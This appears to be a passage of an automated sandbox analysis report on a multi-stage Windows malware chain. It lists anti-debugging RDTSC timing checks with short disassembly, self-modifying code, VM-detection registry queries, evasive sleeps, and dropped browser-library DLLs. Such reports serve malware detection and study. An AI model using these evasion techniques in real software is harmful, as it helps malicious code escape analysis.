                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7F3A2D second address: 7F3A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FA1C54A6E96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7F3A38 second address: 7F3A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C451429Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FA1C4514296h 0x00000014 jne 00007FA1C4514296h 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7EB04B second address: 7EB08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C54A6EA6h 0x00000009 jns 00007FA1C54A6E96h 0x0000000f popad 0x00000010 jnp 00007FA1C54A6EAFh 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7EB08B second address: 7EB097 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA1C451429Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7F2E6C second address: 7F2E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7F2E70 second address: 7F2E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7F3298 second address: 7F329C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7F329C second address: 7F32B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FA1C45142A6h 0x0000000c jbe 00007FA1C4514296h 0x00000012 jmp 00007FA1C451429Ah 0x00000017 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7F5A23 second address: 7F5A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7F5A27 second address: 7F5A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                              Tries to evade debugger and weak emulator (self modifying code)
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSpecial instruction interceptor: First address: 71ED2F instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSpecial instruction interceptor: First address: 71EC17 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSpecial instruction interceptor: First address: 95079E instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 67ED2F instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 67EC17 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 8B079E instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSpecial instruction interceptor: First address: AF7915 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSpecial instruction interceptor: First address: C9FCB5 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSpecial instruction interceptor: First address: CC7E54 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSpecial instruction interceptor: First address: D258A4 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSpecial instruction interceptor: First address: EEFD4F instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSpecial instruction interceptor: First address: EEFE22 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSpecial instruction interceptor: First address: 109661E instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSpecial instruction interceptor: First address: 109CAC9 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSpecial instruction interceptor: First address: 112BE21 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSpecial instruction interceptor: First address: 1094B5E instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSpecial instruction interceptor: First address: 707AE6 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSpecial instruction interceptor: First address: 7079DA instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSpecial instruction interceptor: First address: 8D3978 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSpecial instruction interceptor: First address: 93D48B instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSpecial instruction interceptor: First address: CFDDAC instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSpecial instruction interceptor: First address: CFDE7C instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSpecial instruction interceptor: First address: CFB5C2 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSpecial instruction interceptor: First address: EC9F69 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSpecial instruction interceptor: First address: EB1479 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSpecial instruction interceptor: First address: F2A4F4 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeSpecial instruction interceptor: First address: 242F84 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeSpecial instruction interceptor: First address: 250E86 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeSpecial instruction interceptor: First address: 250EF1 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeSpecial instruction interceptor: First address: 2D1F4B instructions caused by: Self-modifying code
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeSpecial instruction interceptor: First address: E1ED2F instructions caused by: Self-modifying code
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeSpecial instruction interceptor: First address: E1EC17 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeSpecial instruction interceptor: First address: 105079E instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeSpecial instruction interceptor: First address: 12BD9BC instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeSpecial instruction interceptor: First address: 145F61A instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeSpecial instruction interceptor: First address: 12BB3BE instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: 1090000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: 2B70000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: 4B70000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: 5240000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: 6240000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: 6370000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: 7370000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: B4C0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: C4C0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: C950000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: D950000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: EB50000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: FB50000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: 10B50000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: 2810000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: 2880000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory allocated: 4880000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeMemory allocated: 22C0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeMemory allocated: 2420000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeMemory allocated: 4420000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_04DA0B3E rdtsc 3_2_04DA0B3E
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1344Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1316Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1363Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1344Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow / User API: threadDelayed 628
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow / User API: threadDelayed 925
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow / User API: threadDelayed 881
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow / User API: threadDelayed 997
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow / User API: threadDelayed 1029
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeWindow / User API: threadDelayed 9653
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7246
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2411
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5998
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2647
                              Source: C:\Users\user\AppData\Local\Temp\service123.exeWindow / User API: threadDelayed 9706
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\4l693L.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2340
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2450
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2472
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 180Thread sleep time: -54027s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5844Thread sleep count: 1344 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5844Thread sleep time: -2689344s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5676Thread sleep count: 1316 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5676Thread sleep time: -2633316s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6164Thread sleep count: 266 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6164Thread sleep time: -7980000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3744Thread sleep count: 1363 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3744Thread sleep time: -2727363s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6656Thread sleep time: -180000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4900Thread sleep count: 1344 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4900Thread sleep time: -2689344s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exe TID: 6012Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exe TID: 2516Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe TID: 5628Thread sleep time: -34017s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe TID: 5788Thread sleep time: -50025s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe TID: 5924Thread sleep time: -32000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe TID: 4088Thread sleep time: -40020s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe TID: 2088Thread sleep time: -44022s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe TID: 3568Thread sleep time: -52026s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe TID: 2652Thread sleep time: -50025s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe TID: 7204Thread sleep time: -180000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe TID: 7236Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe TID: 4548Thread sleep count: 628 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe TID: 4548Thread sleep time: -1256628s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe TID: 3004Thread sleep count: 925 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe TID: 3004Thread sleep time: -1850925s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe TID: 5268Thread sleep time: -40000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe TID: 4268Thread sleep count: 881 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe TID: 4268Thread sleep time: -1762881s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe TID: 2312Thread sleep count: 997 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe TID: 2312Thread sleep time: -1994997s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe TID: 3448Thread sleep count: 1029 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe TID: 3448Thread sleep time: -2059029s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe TID: 7220Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe TID: 7068Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -33204139332677172s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -100000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -99870s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -99765s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -99620s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -99139s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -98983s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -98858s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -98749s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -98640s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -98526s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -98412s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -98281s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -98171s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -98062s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -97952s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -97843s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -97734s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -97624s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -97504s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -97375s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -97265s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -97155s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -97039s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -96935s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -96773s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -96468s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -96343s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -96234s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -96124s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -96015s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -95906s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -95796s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -95687s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -95559s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -95406s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -95298s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -95175s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -95025s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -94913s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -94799s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -94672s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -94567s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -94372s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -94247s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -94145s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -94011s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -93906s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -93794s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -93669s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -93562s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -93451s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -93349s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -93210s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -93090s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -92986s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -92850s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe TID: 7720Thread sleep time: -92733s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep count: 7246 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep count: 2411 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7388Thread sleep time: -8301034833169293s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe TID: 1900Thread sleep time: -210000s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4412Thread sleep count: 5998 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4412Thread sleep count: 2647 > 30
